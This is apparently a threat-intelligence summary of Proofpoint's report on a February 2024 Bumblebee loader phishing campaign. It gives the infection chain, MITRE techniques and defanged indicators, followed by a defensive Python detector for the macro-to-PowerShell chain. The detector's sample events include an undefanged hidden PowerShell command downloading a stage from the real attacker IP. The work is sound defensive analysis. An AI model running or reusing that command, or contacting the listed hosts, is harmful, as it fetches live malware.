Bumblebee Buzzes Back in Black  | Proofpoint US

Proofpoint researchers observed the Bumblebee loader return on 8 February 2024 via a voicemail-themed email campaign that used OneDrive links to deliver a macro-enabled Word document which ultimately downloaded and executed a Bumblebee DLL. The campaign used VBA macros to drop and run a scripted downloader that fetched stages from 213[.]139.205.131 and connected to C2 infrastructure such as q905hr35[.]life. #Bumblebee #OneDrive

Key points

  • Bumblebee reappeared in threat data on 2024-02-08 after ~4 months of absence.
  • The campaign sent voicemail-themed emails from info@quarlesaa[.]com containing OneDrive links to macro-enabled Word documents (e.g., ReleaseEvans#96.docm) spoofing Humane.
  • The Word document used VBA macros to write a temporary script to %TEMP% (example: %TEMP%/radD7A21.tmp) and executed it via wscript.
  • The dropped script contained a PowerShell command that downloaded the next-stage file “update_ver” from 213[.]139.205.131; a second PowerShell stage downloaded and executed the Bumblebee DLL (w_ver.dat / w_ver.dll).
  • Observed Bumblebee configuration included Campaign ID “dcc3” and RC4 key “NEW_BLACK”.
  • IOCs published include OneDrive lure URLs, Word document SHA256 hashes, the downloader URLs on 213[.]139.205.131, Bumblebee DLL hash, the C2 domain q905hr35[.]life, and C2 IP 49.13.76[.]144:443.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Use of OneDrive URLs directing recipients to a malicious Word document (‘contained OneDrive URLs.’)
  • [T1204.002] User Execution: Malicious File – VBA macros in the document created and executed a script in the Windows temporary directory using wscript (‘The document used macros to create a script in the Windows temporary directory… The macro then executed the dropped file using “wscript”.’)
  • [T1059] Command and Scripting Interpreter – PowerShell commands in the dropped temporary file were used to download and run subsequent stages including the Bumblebee DLL (‘Inside the dropped temporary file was a PowerShell command that downloads and executes the next stage…’)
  • [T1105] Ingress Tool Transfer – Files for next stages were retrieved from remote servers (e.g., the script downloaded “update_ver” from a remote server) (‘download and executes the next stage from a remote server, stored in file “update_ver”’)
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 and stage hosting used HTTP/HTTPS endpoints and an IP:port C2 (e.g., 49.13.76[.]144:443 and q905hr35[.]life) (‘Active Bumblebee C2 IP on Feb 8’)

Indicators of Compromise

  • [URL] OneDrive lure URLs – hxxps[:]//1drv[.]ms/w/s!At-ya4h-odvFe-M3JKvLzB19GQA?e=djPGy, hxxps[:]//1drv[.]ms/w/s!AuSuRB5deTxugQ-83_HzIqbBWuE1?e=9f2plW
  • [SHA256] Word document samples – 0cef17ba672793d8e32216240706cf46e3a2894d0e558906a1782405a8f4decf, 86a7da7c7ed5b915080ad5eaa0fdb810f7e91aa3e86034cbab13c59d3c581c0e (and 1 more hash)
  • [SHA256] Dropped temporary script in %TEMP% – 2bc95ede5c16f9be01d91e0d7b0231d3c75384c37bfd970d57caca1e2bbe730f
  • [URL] Downloader endpoints on attacker host – hxxp[:]//213[.]139.205.131/update_ver, hxxp[:]//213[.]139.205.131/w_ver.dat
  • [Domain/IP] C2 infrastructure – q905hr35[.]life, 49.13.76[.]144:443

The Word document lure delivered via OneDrive links used VBA macros to reconstruct a script from CustomDocumentProperties and write it to the user’s %TEMP% directory, then invoked that script with wscript. That temporary script contained a PowerShell command which fetched a file named “update_ver” from hxxp://213[.]139.205.131/update_ver; a subsequent PowerShell stage then downloaded w_ver.dat (the Bumblebee DLL) from hxxp://213[.]139.205.131/w_ver.dat and executed it, resulting in the Bumblebee loader (w_ver.dll, SHA256 c34e5d36bd3a9a6fca92e900ab015aa50bb20d2cd6c0b6e03d070efe09ee689a) being loaded and establishing C2 connections (e.g., q905hr35[.]life and 49.13.76[.]144:443).

Technical specifics observed in the campaign include the macro using CustomDocumentProperties fields (SpecialProps, SpecialProps1-3) to build the dropped script (example path %TEMP%/radD7A21.tmp), execution via “wscript”, PowerShell-based stage execution, and Bumblebee configuration markers including Campaign ID “dcc3” and RC4 key “NEW_BLACK”. The chain highlights an email -> OneDrive link -> .docm -> VBA macro -> temporary script -> PowerShell -> DLL pattern, with downloads and C2 over web protocols.

Detection and response should focus on blocking the OneDrive lure URLs and the attacker-hosted download endpoints, alerting on the listed SHA256 hashes, monitoring for wscript/VBScript execution from %TEMP% and for unexpected PowerShell activity that performs network fetches, and tracking known Bumblebee C2 domains and IPs. Because VBA macros have become less common in recent campaigns, macro-based chains like this one may slip past heuristics tuned to newer techniques and need specific rule coverage.
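As an added defender-side example (not code from the Proofpoint post), the following Python runs the chain detection described above over constructed process-creation events: it flags the Office -> wscript (script in %TEMP%) -> PowerShell network fetch parent chain and any command line naming the report's staging or C2 hosts. The Sysmon-style field names and the sample command lines are assumptions.

```python
import re

# Infrastructure named in the report, undefanged here so it can be matched.
IOC_HOSTS = {"213.139.205.131", "q905hr35.life", "49.13.76.144"}
OFFICE = {"winword.exe", "excel.exe"}
# Command-line cues for a PowerShell network fetch (not exhaustive).
FETCH_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|webclient|https?://", re.I)
# Script argument living in the user's %TEMP% directory with a .tmp extension, as in the report.
TEMP_SCRIPT_RE = re.compile(r"\\appdata\\local\\temp\\[^\s\"']+\.tmp", re.I)

# Constructed Sysmon-style process-creation events (field names assumed), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\ReleaseEvans#96.docm"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\radD7A21.tmp"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -w hidden -c Invoke-WebRequest http://213.139.205.131/update_ver"},
    {"pid": 400, "ppid": 7, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest https://intranet.example/health"},  # benign: no Office/wscript parent
]

def _name(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestors(events, pid):
    """Return the parent chain of pid, nearest parent first, from the pid->ppid index."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            chain.append(by_pid[pid])
    return chain

def detect(events):
    """Return (pid, reason) findings for the .docm -> wscript -> PowerShell -> download chain."""
    findings = []
    for e in events:
        name, cmd = _name(e["image"]), e["cmdline"]
        chain = {_name(a["image"]) for a in ancestors(events, e["pid"])}
        if any(h in cmd.lower() for h in IOC_HOSTS):
            findings.append((e["pid"], "known Bumblebee staging/C2 host in command line"))
        if name == "wscript.exe" and TEMP_SCRIPT_RE.search(cmd) and chain & OFFICE:
            findings.append((e["pid"], "Office process spawned wscript on a %TEMP% .tmp script"))
        if name == "powershell.exe" and FETCH_RE.search(cmd) and "wscript.exe" in chain and chain & OFFICE:
            findings.append((e["pid"], "Office -> wscript -> PowerShell network fetch chain"))
    return findings
```

The parent-chain rule fires on the sequence even if the attacker host changes, while the IOC rule catches the known infrastructure on its own; the benign intranet fetch under a non-Office parent produces no finding.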

Read more: https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black